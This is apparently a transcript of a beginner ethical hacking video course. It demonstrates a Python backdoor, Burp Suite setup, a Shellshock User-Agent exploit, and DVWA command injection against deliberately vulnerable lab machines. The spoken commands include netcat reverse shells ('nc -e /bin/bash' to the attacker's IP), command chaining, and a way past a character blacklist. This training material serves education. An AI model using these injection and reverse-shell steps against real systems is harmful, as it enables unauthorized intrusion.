give it a try since tester.txt is in the same directory as both of my programs. If I press enter, let's go to our Windows 10 desktop, and here is the tester.txt. If I open the file, here it opens hello world. So we successfully managed to upload the file to the target machine. This file wasn't here before we ran our program. Now let's see whether we can still execute commands. Maybe it crashed something. So if I run whoami, I can still execute more commands. Let's give a try to the download function. So in this case, we're going to download something from the Windows 10 desktop. So what I'm going to do is I'm going to open a notepad and I'm going to write something. So for example, this is a file from the Windows 10 machine. I'm going to save it onto my desktop as a try download me.txt. So here it is on the desktop, and if I go right here, type dir once again, we should see that file inside of our dir output. Let's give it a try and try to download it. So download, try download me.txt. One more thing, make sure you specify the name correctly, otherwise it will also crash, because if you specify a name of the file that doesn't exist, it will not be able to find it. So if I press enter right here, it will take a few seconds, and if I go inside of my backdoor directory, type ls once again, here we have try download me.txt file. If I cat it to see the contents, here it is. This is a file from the Windows 10 machine. So our commands work successfully. The one last command that we must give it a try is the clear command. So if I type clear, it will clear our screen and we will be able to execute other commands in a more clear terminal. Great, everything works as we planned. Now, the one last command that we must test is the quit command. So if I go to my task manager, while I still didn't close the backdoor, you should see backdoor.txt running as a background process on the Windows 10 machine. But if I type quit, it will close the server from the Kali Linux machine, but let's see whether it will also close the backdoor in Windows 10 machine. And it does indeed close it. We no longer see backdoor.txt process right here inside of our task manager. So everything worked as we planned. All of the commands that we applied are working successfully. Now, what you can do from here is you can try applying different commands and making this backdoor even better. You can try adding a keylogger in Python. You can try creating a persistence using registry. You can try executing screenshots. And all of this I do in my Python 3 hacking course. But since this is a beginner course in complete ethical hacking, we will stop here and we're going to focus on some other subjects from the next video. But you can improve this program a lot if you learn Python and add even more functions to this program. Nonetheless, this is another project that we did successfully, and in the next section, we're going to touch on a big subject of web app penetration testing. See you in the next video. Welcome back. Time to cover another big topic for an ethical hacker, and that is web app penetration testing. This is another topic that you can further specialize in if you decide that this is what you want to do. But what it essentially is discovering vulnerabilities and bugs inside of a website. Why is this so important? Why are we devoting an entire section only for this, and we didn't throw this inside an exploitation section, for example, as a part of it? Why aren't we discussing all applications that you can run on a machine and not just web applications? Well, it's pretty simple. Websites are exposed to the internet. That means anyone can visit it and look at it. As good as this is, it also brings danger to the table. Because if anyone can visit it and look at it, then anyone can also try to attack it, right? For example, let's say we have a server hosting a web page on port 80 for HTTP and on port 443 for HTTPS. This website can be any type of website, from chat forum to some university page. It doesn't really matter. What matters is that it's accessible to the internet by anyone who knows its domain or its IP address. So just by knowing the name of the website or its IP address, anyone can look at that website, even us from our Kali Linux machine. The problem is that an attacker isn't interested in just watching the web page and using it as it's planned to be used. An attacker will try to execute different types of the attacks, from code injection to brute force attacks if there is a login page. The attacker can even try extracting data from the database and changing the code of the web page itself. We can try uploading malicious files to the server to see whether that will work too. We can test for different user inputs to see if the input is well filtered or is the website code written poorly and doesn't filter any input whatsoever. you know what the best part is about all of this? A poorly written code that makes website vulnerable to some type of the attack doesn't only present danger to the server hosting that website, but it also presents danger to everyone that visits that website as well. For example, we can try to inject code into a certain web page, and if that is successful, that code will be displayed and ran by anyone that visits that page after the attack. This could be some malicious JavaScript code that could send the victim's private information to our Kali Linux machine where we can read it. We can also try injecting different redirection links into that website so anyone searching for that page gets redirected to our malicious website where we can steal their information. Imagine we do something like this on a website as big as PayPal. That would be a big problem, right? That's why web penetration testing is so important. And most of the attacks that we will cover are based on poorly written code. We know that websites are mainly made in HTML, CSS, and JavaScript code. All of them can be used to attack websites with code injection. And what code injection is simply writing code somewhere where you shouldn't be writing it. For example, let us say a website has a search bar where you can search different book titles. A regular user would type book titles in that search bar in order to find a book that they want to read. But an attacker would try writing code there. It might or might not work. If the user input, which in this case would be a book name, is poorly filtered and it allows anything to be written there, then the code injection will most likely work and we will be able to inject code into that web page. Cool, right? Now, the most dangerous one out of these three would be JavaScript code injection, or also known as cross-site scripting attack, or XSS attack. Why? Well, HTML is static and the only thing we could do with an HTML code injection is to change the look of a web page. While with JavaScript, we can execute various functions which give us much more power. Another thing that we can try is to communicate with the database. For example, let's say a website has a login page where you need to input a username and a password. Usually big servers and websites will store those usernames and passwords inside of a database, and every time a visitor of the website tries to log in, the server will then communicate with the database. It will compare the visitor's input of username and password to see if they match with something from their database, and if they do, then the website will log in the user to their profile and the user will have access to all of their data. This type of communication between the website and the database can be done with something called SQL queries. And SQL is a language that allows us to interact with databases. It is heavily deployed in websites. Now, this right here is an example of a normal usage of a website. So the user sends username and password, website checks it. If it's inside its database, if it is correct, it logs in the user. If it is not correct, it will print out password incorrect or email incorrect or something like that. But what if we as an attacker try sending an SQL query instead of a username, for example? What then? Well, there are two outcomes. Either the web page is well coded and it filters out user input so that the website doesn't allow SQL query syntax and it will not even process it to the database. Or it is poorly written and it will just forward our SQL query to their database. And this can be critical because we can send a query where we request the entire database back and the database will just send us all of its contents where we will have everyone's usernames and everyone's passwords who have an account on that website. That would be really, really bad. And that is the reason this is one of the most dangerous attacks that you can do on a web page. It is also one of the most common ones as well. Ever read a heading inside of some newspaper that said something like 10 million credit card numbers stolen or some big website got millions of passwords leaked? Well, now you know how they do it. they do it by injecting SQL queries into a non-filtered user input. This attack is also known as an SQL injection. You're starting to understand now why this is as important as exploitation of network vulnerabilities that we did. Now, another type of the attack could be aimed at a server, and this would also be an attack through a user input field. Let's say, for example, we have a website that pings other websites. You input an IP address of a different website, and our website will tell you whether that other website is up or offline. So we could type, for example, some random IP, let's say 75.101.23.55, and the next step is website pinging that IP to determine if it's online or offline. How would it do that? Well, it would most likely run the ping command on its system, so if the website is hosted on a machine, the machine would run ping 75.101.23.55, or if it is hosted on a server, the server could execute that command. I believe by now you can already see where the problem can occur. What happens if instead of an IP address we send a different command, such as whoami or ls? Well, as we already know, it will all depend whether the user input is well filtered. If it isn't, it will execute any command that we send, and then we can gain access to that server by trying to establish a connection with netget command just because someone didn't write website code well. All of these things that we discussed are also known as bugs. Or you might have heard about the term bug bounty. It is a pretty big thing. Websites will pay you to find vulnerabilities that we just talked about, and they will pay you a lot for them. And as we already know by now, all of these vulnerabilities happen due to poorly written code. Or in other words, these vulnerabilities can occur anywhere where the website will process a visitor's input. Whether it's inside a search bar, a username field, or inside of a link, if that what you send to the website is getting processed and it doesn't get filtered, then we could have a bug. I will give you another example right here, just so you can test and try to figure out which vulnerability this is out of the 3 that we mentioned in this video. Let's say we have a website where you can watch videos or movies. So it's got a search bar where you can input a movie name, and then it will display the movies that you searched for. And now let's say that instead of a movie name, you send malicious JavaScript code. What vulnerability is this? I will give you 5 seconds to figure it out. And it is cross-site scripting or XSS attack. Don't worry if you didn't remember it. Each of these attacks we will cover in details, and we will see a practical example of each one of them. And also besides these attacks, we will cover what I believe most of you are also interested in, and that is brute force attacks. And these brute force attacks are pretty much simple to explain. It is not a vulnerability. It is just a poor password or a weak password that someone uses that we manage to break, or should I say, guess. How do we guess it? Well, we send a lot of different passwords and hope that eventually we send the correct one. That is the entire process behind a brute force attack. And if the target's account has a weak password, and if that password is in the list that we're using to brute force, then it's pretty much game over. We will be able to get it. Now this can also come with different difficulties, such as if the website blocks inputting passwords after 5 wrong attempts, but this can also be bypassed. Nonetheless, these are some of the most known website attacks, and in this section we will see how to perform each one of them. See you in the next video. How do we communicate with a website? Most of you probably know this already, but I will mention it in this video just so we can get a quick refresher. We explained all of these attacks in the previous video, but it's important we know the basics behind communication between a client and a website. So we send requests and receive pages back with the help of HTTP requests and HTTP responses. HTTP request is something that we send to the website once we want to get a certain web page from that website. And HTTP response is a response from the website telling us that either it found the page that we were looking for or it didn't. HTTP response also contains an HTML code of that web page that we requested. Now, this would be a basic explanation of the process, but let us also take a look at how an HTTP request and an HTTP response look like. So, if we take a look at this image right here, in the red letters, we can see HTTP request to some web page, while in the blue letters, we see an HTTP response. Let us focus first on HTTP request. So, some of the known fields from the HTTP request would be ones you see in the image. We got hosts, and that field defines the website domain that you're searching for. Sometimes this field can also have a port number, due to web servers sometimes hosting more than one website. Besides that, we also got the user agent field, and this field is used by server to identify the client that is connecting to the server. By identifying, I mean it will usually identify the web browser that the client is using. HTTP request can also have cookies, which we can't see here in this picture, but what cookies are values exchanged between a client and the server that are used for holding data and information about a certain session that the user has. Sometimes an HTTP request can also have authorization parameter, which is used to check for the identity. With this parameter, usernames and passwords are sent to the website. On the other hand, we got an HTTP response, which also has some special fields of its own. First thing we see is the status code. Now, a field called status code doesn't exist, but the value will be stored in the first line of the response. Most of you encountered at some point an 404 error once you try to search for a certain web page, and 404 in this case is a status code. In this picture, we can see a status code of 200, which indicates that the page exists and that we loaded it successfully. Besides this, we got set cookie field, and this field, if defined, will establish values of cookies to the client. This value server can use later to identify the client and to also store client's data. We also got a field called cache control, and this field is used if the content of the response should get stored inside the browser of the client or not. And we also got content length that will tell us size of the response in bytes. Below all of these fields, we can see HTML tags opening, and down there is the web page that we requested from this website. It sends us the web page code that will then get rendered inside of our browser, and it will show us the web page. Simple as that. Great. Now that we refreshed our memory about this, let us finally start attacking websites. See you in the next video. Welcome back. And in this video, I want to talk about another thing that we already covered, and that is enumeration and information gathering. So this is a step that you also shouldn't skip once attacking websites. We already covered information gathering, so this video is more like something as a refresher, just so you know which tools you can use to enumerate and to scan different websites. So for this section, we're going to be using Metasploitable most of the time. We're going to attack some different targets, but for the start, we're attacking Metasploitable. So make sure that Metasploitable is up and running. I also ran the ifconfig command, and it gave me the IP address of 192.168.1.8. So the first thing that we can do is try to visit the web page of that IP address, just to see what we have. And to do that, we can open our Firefox. And remember that once we attacked Metasploitable, we said that we're going to attack port 80 later in the course. Now it came that time. We are going to attack port 80. And once again, we're attacking port 80 because it hosts a web page. If I visit this IP address of my Metasploitable, it will open this page right here. It tells us the warning, the contact, and the login to get started. But down here we get a couple of links. If we go to any one of them, it will lead us to a different directory of this web page. Currently, we're in the /dev directory. If I go to the parent directory, it will go back to the 192.168.1.8, which is the main or the parent directory. If I go and visit dvwa, it will lead me to this directory right here, which is /dvwa/login.php. And this file hosts a login form. So we got username and password to input. If we take a look at this web page a little more clearly, we can see down here that it tells us default username is admin with password. So for now, we're not going to brute force this, we're just going to log in so we can see what we have behind this login form. And here it is. We got dvwa, or as we can see right here, it has this name. We get a warning, a disclaimer, and here we get a bunch of different attacks that we can perform. Remember, we talked about XSS, we talked about SQL injection, we also mentioned brute force and command injection, and these pages are pages where we can practice these type of the attacks. All of them are stored in a separate directory. Now, we can go about discovering all of the directories on a website like this, or we can use different tools to automate this process. So, to enumerate and to gather as much information that you can about the website, you can use the tools that we already covered, such as the Harvester to gather emails, such as WhatWeb to discover the website technologies, and all of them we already covered. We're not going to do that once again, but there is another cool tool that you can use to discover directories, and that tool is called Derb. Derb is already installed in Kali Linux by default, so only thing we need to do is to type Derb and we will get the help menu for this specific tool. We get a bunch of options as we can see right here, but also down here we get the examples of usage of this tool. So the most simple test, as it says in the brackets, would be just specifying derb and then the link to the web page that we want to scan. If I go up here, we can also see that we can specify different word list, but I believe derb has a default word list that it uses, so we're just going to go with that one instead. So if I type derb and then 192.168.1.8, whoops, invalid URL, so we must specify derb and then http //192.168.1.8. So this is how we must specify a link. If I press enter, it will go and search for different subdirectories inside of that web page. If I scroll a little bit up, we can also see it managed to find some of them. It found /index, /index.php, /phpinfo, /phpinfo.php. We got /test, /tvwiki, and if I go all the way down, we should be able to find even more subdirectories on that web page. And right here, we might be able to find something interesting. For example, we can go and visit any one of them. Let's visit robots.txt. If I copy the link, go up here, paste the link, we get something right here. User agent, disallow. We already know what user agent is. It is a field inside of the HTTP requests. Let's also see what else we managed to discover. We got /test/themes, readme, phpMyAdmin. That could be useful. Let us check out what this is. You never know. Anything that you find particularly useful or interesting, you might want to check out by visiting that page. And this seems to be some file with the PHP code. So let's go and check out something else. And it seems that there is a directory called passwd. Let's see what this is. If I copy that as well, go and paste it. Missing fields, fields go with marker required. Please go back in your browser and try again. Topic web home. So it seems that this page is missing some fields. Right now we don't really know what this is all about, but by visiting this we discover more and more pages that we might not be able to find once browsing through that page on our own. Now right here we can also notice some other information that we get on the side besides these links, and that is the code. And if you remember, this code is simply just a status code which tells us whether it managed to load a page. Right now we get code 200 for most of these pages. Sometimes we will get code like 304, which means that the page gets redirected to a different page. And at the right we also get the size of that specific page, which is not something that we're currently interested in, but you also get that information if you want to see it. We can see other links as well, and you would go about visiting any link right here that you find interesting. So let us go down, and it seems that it found 56 links, but that is only with this specific word list. It also downloads, I believe it downloads the contents, but I'm not really sure about that. However, what you can do is, if you're not satisfied with the results from this derb directory, you can specify your own word list if you want. Nonetheless, this is not that of an important tool for us. However, you can use it if you'd like, and you can combine it with different tools that we covered for the information gathering to gather as much information about a specific website. Now, since we already covered information gathering, I'm not going to go into those different tools. You can also try finding new tools from the GitHub or somewhere else, and you can experiment with those tools as well. But right now, what we're going to do in the next video is we're going to configure a really important tool that is called Burp Suite. And as soon as we do that, we're ready to perform our first attack. Welcome back. Time to configure the tool called Burp Suite. And Burp Suite is a tool that allows us to intercept and take a look at different HTTP requests and HTTP responses. It also allows us to change those HTTP requests to our liking and then forward them to our target. It is also considered a proxy, so everything and every link that we visit through our Firefox from now on will go through Burp Suite first, and we will be able to inspect all of our HTTP requests and responses. Let us see how we can configure it and get it to work. So we already got Burp Suite inside of our Kali Linux machine. If you go onto the menu and then Web Application Analysis, you will have it right here. The first thing that we want to do is double click it to start it up. This will start up the Burp Suite Community Edition, and there is also a Professional Edition that you must pay for, but for now on we're just going to cover the Community Edition inside of this course. It might give you this error, you just want to click on OK, and in just a few seconds we should have the main menu of Burp Suite open up. And here it is, Terms and Conditions. I want to click on Accept. And here it tells us an update is available. I'm not really interested in the update at the moment. Here I want to select the temporary project, click on that and click on Next. I want to select right here Use Burp Defaults and start Burp Suite. After a few seconds, it should open something like this. And we can see a lot of things are happening on our screen. If I enlarge it, you will see that we get a bunch of different options with this Burp Suite tool. But let's not think about them at the moment. For now, let us just think about how we can configure our Burp Suite to be used by Firefox as a proxy. Well, the first thing that we want to do is navigate to the Burp Suite tool, click on Proxy right here, and under the proxy we get this Options tab. Under the options we will have these proxy listeners, and under the proxy listeners you want to select this right here, and you want to click on Edit. If you don't have anything right here, just click on Add. Here we want to bind to port 8080 and we want to bind to address loopback only. Once you get this set up, click on OK. And after you got this, what we want to do is we want to navigate to our Firefox, and on these three lines right here we want to navigate to the Preferences. Under the General tab in the Preferences, we want to navigate all the way down, and at the last option where we got Network Settings, we want to click on Settings. Here it will ask us to configure proxy access to the internet, and we want to set right here Manual Proxy Configuration. Under the HTTP proxy, we want to set the IP address, and in our case we're going to set the IP address of our local host, which is for everyone this IP address right here, and the port should be 8080. And then we can set use this proxy for all protocols. Also make sure that the SOCKS v5 is checked, and once you do all of that, you can click on OK. Now that we did this, if I go and try to visit google.com, it will tell me software is preventing Firefox from safely connecting to this website. And you should get this error too. Why does this happen? Well, our Firefox doesn't really trust our Burp Suite tool. And currently, all of the packets are going through this tool before we can see them on our screen. So we're getting a warning from the Firefox that some software is preventing from having a secure connection to that website. What can we do about this? Well, we can go to our Firefox and visit any HTTP website that we want. It won't present us a problem for HTTP websites. It will only present us a problem for HTTPS websites. But we also want to visit HTTPS websites such as Facebook, such as Google, and all the others. To do that, we must type this link inside of our search bar, which is http:// and then burp. Press enter, and you will open this page right here. It will tell us welcome to Burp Suite Community Edition, and here we will be able to download the certificate, which we can then import inside of our Firefox and make Firefox trust our Burp Suite tool. So just click on CA certificate, click on save file, and click on OK. Once you do that, the file will be inside of our downloads directory, as we can see it right here. This is its name, and all we need to do is go back to the preferences inside of our Firefox, navigate to privacy and security, and all the way down we will have a certificates part. Under the certificates part, we want to click on view certificates, and we want to click on import a certificate. Then you want to navigate to the downloads directory, select the certificate that we just downloaded, and then click on open. We want to select trust this CA to identify websites and trust this CA to identify email users. Click on OK, and also click on OK right here. If I go back and I refresh google.com, it seems to still load. It doesn't really do anything. So why isn't it loading our page? Well, in the Burp Suite by default, you should see if you go back after trying to open Google once again, that this proxy will turn orange and this intercept will also turn orange. So if we go to proxy and then intercept, we will have an HTTP request. And this is a request that we just initiated to the host www.google.com. We can see all of those fields that we talked about, such as host, such as user agent. Under the user agent, we can see which type of web browser are we using. We can also see the cookie right here. And the reason why we are not loading the page and it is still loading right here is because the intercept is turned on. This means it will intercept this packet before it actually forwards it to the web page. We can forward it manually by pressing this, or we can just turn the intercept off and then it will not intercept any packets. So if I go back to Google, right now you can see we successfully loaded Google. If we want, we can go right here under the target and we can see all the links that we visited while the Burp Suite was running. So we can see Google right here, and we can see all of the requests and responses that we got for the Google. So here is the request for the www.google.com that we just did, and here is the response from the Google that says status code 200 OK, which means we successfully loaded the page, which we indeed loaded, and here is the code of that page. Cool, right? Now we can intercept any packets to any website. Great. Now that we covered configuration of Burp Suite, in the next video, we can go and perform our first attack. And in the future videos, we're also going to cover more details about this Burp Suite tool, but for now on, we just managed to configure it and we're ready to, in the next video, perform our first attack. See you there. Welcome back. It is time that we cover our first vulnerability in a website. And as a first vulnerability, I've chosen to show you the Shellshock exploitation. Now, Shellshock is an older vulnerability. It was discovered in 2014 and you will most likely never find it today while performing penetration tests. But nonetheless, I want to show it to you just because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. This vulnerability occurred due to Bash differently processing environmental variables. With this, many things were hit from DHCP clients, from terminal command lines to CGI scripts inside of a web applications. And in this tutorial, we will see an example of exploiting Shellshock through the CGI script on a web page. Also for this, we're going to download a small ISO file that will allow us to run a virtual machine only for this vulnerability. Don't worry, it will only take a few seconds to install due to it being a small virtual machine, and it is only purposely designed for this specific vulnerability. To download it, you want to go to your Google, you can type in Pentester Lab Shellshock, and you should see a link like this that says CVE 2014-6271 called Shellshock. It will be from the pentesterlab.com, and you want to click on it, and it will navigate you to this page right here where you will have the Shellshock introduction, fingerprinting, and all the other stuff regarding this vulnerability. However, we're not going to go into these details right here because we want to exploit it ourselves. What we want to do is we want to go to the files right here, and you should see this ISO where you want to click on it, and it will download the ISO image with the size of 19.1 megabytes. So you can see it is really small. Once you do that, you want to go to your VirtualBox and you want to create a virtual machine as we usually do. Now I already got Shellshock Lab created with the ISO file that we just downloaded, but what you essentially want to do is you want to click on New, then you can call it anything you want, you can call it Shellshock. You can select right here Linux as an operating system, and the version of Linux is going to be Other Linux 32-bit. Click on that, then you can proceed to next. You can leave it to 256 megabytes of RAM, that is more than enough for this machine. Click on next right here. We want to create a virtual machine, next here as well, and we can click on create. And as usual, there are two more things that we want to do once we create a new virtual machine. We want to navigate to the settings. From the settings, we want to go to network, switch from the NAT to bridged adapter. Select your adapter right here, and another thing that we want to do is we want to add our ISO file. So delete this empty right here, click on the disk icon, click on add, and find the ISO file. In my case, here it is, CVE 2014-6271. Click on choose and click on OK. This will create your Shellshock virtual machine. After you do that, you want to go to your Kali Linux, start your burpsuit tool that we covered already, that we covered the configuration of, and you want to go start it up. And after you start it up, you can open your Firefox. Now, you might have noticed if you tried before watching this video that once you try to visit Firefox without having burpsuit running, you will not be able to visit any page. And that is because we set our burpsuit to be a proxy for our Firefox. So now, every time you want to visit Firefox page or any website page, you must have burpsuit open. And you must also have the intercept turned off so it doesn't intercept any packets. Otherwise, your page will just load forever. Now that we opened the Firefox, let us open burpsuit 2. It is starting the project, and as soon as it opens up, we will be able to visit our page on our Shellshock virtual machine. Okay, so now that burpsuit opened, go to target, then go to proxy and turn off the intercept right here. So intercept should be off. Once you do that, the next thing that we want to do is we want to start our Shellshock virtual machine. If you're starting it for the first time, it should only take a few seconds to set everything up, since it is a really small virtual machine. And once it opens up, it won't even prompt you for a login. There is no login available inside of this machine right here. It will just enter the command line where we want to type ifconfig just to find out the IP address of this machine, and in this case, it is 192.168.1.10. So all we want to do is we want to go to our Firefox and visit this page to see what we have. And this seems to be the entire page of this virtual machine. We get this system is running, the time that it is running, currently for 0 minutes because we just started it up, and we get the kernel of that virtual machine. Now, if we take a look at our burp suit right now and we go to the targets and we go to our IP address of the Shellshock virtual machine, we will see all the links that we requested once trying to open the web page of our Shellshock virtual machine. We will see this / directory, we will see this JavaScript file, and we will see this CGI bin status directory. So we get a CGI script right here. If we go to the response of that request that we sent, and to do that you simply just select the request that you want to go to and click on response right here. Then we will see down here this output that looks a lot like an output to the command uname-a. For example, if you run the command uname-a inside of your terminal, it will give you an output like this, which will tell you which version of Linux are you running, and so on and so on. We get a similar output inside of our burp suit, as we can see right here. And in most cases, this output is ran by the uname-i command, and it is ran by bash. And inside this request that we did, user agent field that we got inside of the request is an environmental variable when processed inside of this CGI script. So what we can try is to inject a command in that field. However, it won't work that easy. We can't just inject, for example, whoami command instead of this. It will not give us any output back. You might be asking why? Well, because Shellshock vulnerability is based on first specifying an empty function. And I know this might sound confusing, but just stick with me for a couple more minutes and I will explain it how it works. The vulnerability itself was discovered when inside of an environmental variable such as this user agent, empty function syntax was specified. And empty function syntax looks something like this. Let me show you inside of the terminal. It is this set of characters. So open bracket, close bracket, then space, open curly bracket, then space, 2 dots, dot and comma, and closed curly bracket, and at the end another dot and comma. And this right here is a syntax for an empty function. So any command that we want to run, before it, we must have this empty function syntax. Why? Well, when bash gets these characters in this order, or if bash gets this empty function with the variable, instead of blocking it, it will accept it with the variable that comes after, and it runs it as a command on the server. And that is the entire vulnerability. All we have to do is to specify a command after this syntax, and it should work. Now, to do that, we must send this HTTP request right here to this CGI bin script once again. And we must specify instead of the user agent the empty function syntax and then our command. So how can we do that? How can we send the request once again? Well, luckily, burp suit allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again. So we select it right here. Then we right click and send to repeater right here. Then you will see this repeater part light up. We want to go there. And here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the user agent field. Let us remove this. And let's type the syntax for the empty function first. So open and close bracket, then empty space, open curly bracket, then space, 2 dots, comma and dot, close curly bracket, and comma and dot at the end. Now, what you can do after this is you can inject your command. And if you want to, you can test to see if it works with a ping command first. But I'm not going to test it with a ping command. I'm going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back. So what do we want to do right here to establish a connection with our Kali Linux machine? Well, we want to execute /bin bin/bash. And this will tell the target to execute the following command. If we specify -c after, it will tell our target that whatever we send after this will be our command, and we must specify it between the single quotes. So for now, we have the empty function syntax, then /bin/bash -c, then open single quotes and close single quotes, and in between the quotes, we type nc, which stands for netcat, and we specify the IP address of our Kali Linux machine. So let's check it out right here. Sudo ifconfig, test1234 is my password, and I will specify 192.168.1.9. So right here, 192.168.1.9, and I want to specify also the port to connect to. In my case, I will use port 12345, it doesn't really matter, and at the end, we want to specify -e, which stands for what we want to execute on our target machine. And we want to simply just use the bash shell. So we can do that by specifying /bin and /bash. And this is the entire command. I will copy it to my terminal so you can see it enlarged. So copy, and if I clear the screen, paste it right here. This is our entire command, the empty function syntax, and then the function that allows us to establish a connection to our Kali Linux machine. But before we send this request from our burp suite, we must set up a listener right here. So I'm just going to go and type nc lvp and then on the port that we specified, which is 12345. Press enter. This will listen for the incoming connections, and now that we changed the user agent field to our command, we can click on send. If I go back to our Kali Linux terminal, we can see we got the connection from our Shellshock virtual machine. And if I try to execute commands such as who am I, all of that will work. We can see we are the pentester lab. The ls command will give me all of the directories inside of the current directory. I can type the pwd to check out my current working directory, and I'm in the /var/www/cgi-bin folder. Great. So we successfully exploited the Shellshock vulnerability and gained access to this machine. Now, you can also automate this entire process with Metasploit framework. So what we did right here is we manually exploited the target with the help of a burp suite. We sent our request for the CGI bin script to the repeater. Then we changed the user field to our command, which requires the empty syntax at the beginning, and after it, the command that we want to execute, which can be any command that you really want. Then we set up a listener inside of our terminal, and we sent this packet once again, or we sent this request once again. Right here we can see the response to this request, and it tells us that we got the internal server error because it doesn't really recognize this user agent. However, it did execute this command, which is all that we want. Inside of the Metasploit framework, you can type search shellshock, and you can use this exploit right here, which is exploit multi HTTP Apache mods CGI bash environmental execution. You can copy that, type use, and then paste the selection. It will set our payload to be Linux x86 Meterpreter reverse TCP. And if I type show options, I can set my options right here. So what I must set is the rhosts, which is the IP address of my target machine. Let's do that first. What I also must set is this rpath. So this will be the path to the CGI script. So the rpath must be set to CGI-bin/status. If I'm not mistaken, that is the path. Let us see inside of our burp suite. So it indeed is CGI, bin, and then status. And all we're left to do right now is set this and run our exploit. So, oh, pardon me, it's not there. Let us just go and set the target URI. It is target URI that we must set to be the CGI bin status. So let's just set the target URI instead. And let's set the rpath back to /bin, I believe, and let's give this a try. We send this, we get the Meterpreter session 1 opened, and here it is. Get user ID will tell us who we are. we can execute the commands, and we can do everything that we did inside of our exploitation section. So we successfully exploited shell shock vulnerability in two different ways. Manually, by using burpsuit and sending our command in the user agent field, and with the help of this Metasploit framework module. It also exploited the user agent field, as we can see right here. We told the path to be CGI bin status, and we got the Meterpreter reverse shell back. Great. Now that we did this, in the next video, we're going to check out a very similar thing to this, which is called command injection. See you in the next video. Welcome back. In this video, we're going to cover command injection vulnerability. We already know what this is, and we already covered some type of command injection in the previous video once we exploited the shell shock vulnerability. However, now we're going to do it on the web page itself. So, do you remember this example on the screen that we talked about? Say we have a website, and that website can ping an IP address that we tell it to ping, and it will tell us whether that IP address is offline or online. Well, we're going to take a look at this example inside of our Metasploitable. So for this, you want to start your Kali Linux machine and your burpsuit inside of your Kali Linux machine. Now, we won't be using burpsuit in this specific video, but nonetheless, we must have it started because we connected it to be the proxy to our Firefox. If it is not open, we won't be able to visit web pages. After that, you also want to open up your Metasploitable virtual machine and check its IP address, and then we want to visit the command injection page on our Metasploitable machine. So go to your Firefox right here, type in the IP address of your Metasploitable. It will lead you to this official page where we want to go to DVWA. Let us log in with the credentials that they give us, which is admin for the username and password for the password. Click on login. We don't want to save these credentials, and we want to go to the command execution, or otherwise known as command injection. But before we attack it, let us go to DVWA security and set the security to low, because right now we can see down here that the security level is set to high. So let's go right here, check this arrow and click on low. Now, so you can see everything better, I'm going to zoom all of this in. And once you set the security level to be low, you want to click on submit. Great. Now let's go back to our command injection. So as we can see, it tells us that we can ping an IP address for free. So all we need to do is enter an IP address and it will give us a result of whether it is offline or not. Let's give it a try. If I type, for example, the IP address of my router, which is 192.168.1.1, and I click on submit, let us see what it will tell us. And here is the output. It seems to work and it gives correct results. My router is indeed up and running. But if you take a closer look at this output that we got right here, it seems that this is the same output that we get when running ping command inside of a terminal, right? So if I go to my Kali Linux machine and I open the terminal, and I type the command ping 192.168.1.1, and I only want to ping it 3 times. If I press enter, well, we pretty much get the same result right here. It will ping my router 3 times and it will give us a similar output to our Metasploitable page. What does this mean? Well, it most likely means that this web page forwards the command to the server, which in our case is our Metasploitable machine, and then that machine executes ping command to determine whether that IP is up or not. Another cool thing that we get with this page is if I scroll down here, we can see view source, and this is the source code to this page. So we can see whether they filter the input or not. But let us not check source code yet. Let's not cheat and let's just try to execute command injection and get it to work. So how are we going to do that? Well, we can try to execute 2 commands inside of this input bar right here. It does ask us for an IP, but we can also try to concat another command after we specify an IP address. For example, if I type 192, 168.1.1, and I type dot and comma to separate the commands, and after it I type ls-la, which stands for list all including hidden files, and I click on submit, and it works. It gave us both results from the both commands back. It pinged the router first, and after it executed the ls command, and we can see what files our target has. This means there is command injection vulnerability, because this is something that we shouldn't be able to do. We shouldn't be able to execute other commands outside of this ping command. So let us try different commands as well. So let us enter the same IP address, then dot and comma, and then who am I, for example. And it does give us the output of that as well. We're www-data. Okay, but how can we exploit this and gain access to the target with the help of this command injection? It's quite simple, actually. We can use netcat for that. So if we start listener in our Kali Linux terminal, if I go right here and type nc-lvp, and then I'm going to use the good old 12345 port, I start my listener right here. And I go back to this page and run the following command. So I type the IP address, then dot and comma, and then nc-e, where I tell it that I want to execute /bin/bash, and I, after it, specify the IP address of my Kali Linux machine, which in this case is, let me just check it out, 192.168.1.9. So I specified right here 168.1.9, and the port is going to be 12345, which is the same port from our listener. I click on submit, and if I go back to our terminal, we got the connection right here. So we exploited the command injection vulnerability. We can run the commands, type ls, go back and switch through the other directories, and we can check out all the other files. Here is the password file, so we can also check out the passwords. We can check out other commands as well, and everything works great. We exploited this target. Let us exit out of this, and now that we successfully exploited this vulnerability, we can take a look at what the source code was. So let's go down here, click on View Source, and if I enlarge all of this, so we can see it a little bit better, if we take a look at it, we will see that it didn't really filter any user input. They just requested the IP that the user inputs, and they forwarded that IP address to the ping command right here and right here without any filtering whatsoever. That was a big mistake, since because of this we were able to gain access to the target system. Now let's give it a try on a medium security level, and let's see whether we can exploit it then. So I'm going to close this source code, go back to DBA security and change from low to medium. Click on submit, and now the security level is medium. Let's go back to the command injection, and now that it is on medium level, let's give it a try. Let's just start with the same thing that we did previously and try to execute the ls command. So if I go right here, type 192.168.1.1, and then dot and comma, and then, for example, ls-la. If I click on submit, well, nothing seems to happen. It doesn't seem to work anymore. However, luckily, this dot and comma aren't the only ways we can run two commands. If I go to my terminal, if you type, for example, ls dot comma who am I, it will execute both of these commands. So it will give us the output of these commands and then Mr. Hacker as well. But you can also do it like this. Specify these two signs and then who am I, and it will do exactly the same thing. So let's give it a try like this. Maybe they filtered this character, but they didn't filter it like this. If I go here and type 192.168.1.1, and then these two signs, and then, for example, ls-la once again, click on submit, and this will do the same thing. It will still not work. Okay, let's do the same thing, but just delete one of these signs that we put right here. If I show you, right here, copy the same command, paste it right here, and I remove one sign, it will once again execute both of these commands, just as two different processes, so it might execute one before another, however, it will execute both of them. Let us go right here and give it a try, 192.168.1.1, and then one of these signs, and then ls-la. Click on submit, and it works. We get the output of both ping commands and the output of all of the files inside of the current directory on that target system. So first two tries didn't work, probably because those characters were getting filtered and blocked, but if we specify it like this, here, then it seems to work. It seems to bypass any security and it executes our second command. So if I go down here and we take a look at the source code, I enlarge this so we can see the entire code. It seems that they created some type of a blacklist right here. So they removed these characters and this character right here. So anyone that tries to specify a command injection with these characters, it will not work. That's why this is medium security level, and you need to go through a few more commands in order to bypass this. However, it is still bad because they filter some characters out, but others they don't filter at all. For example, besides this one character that we 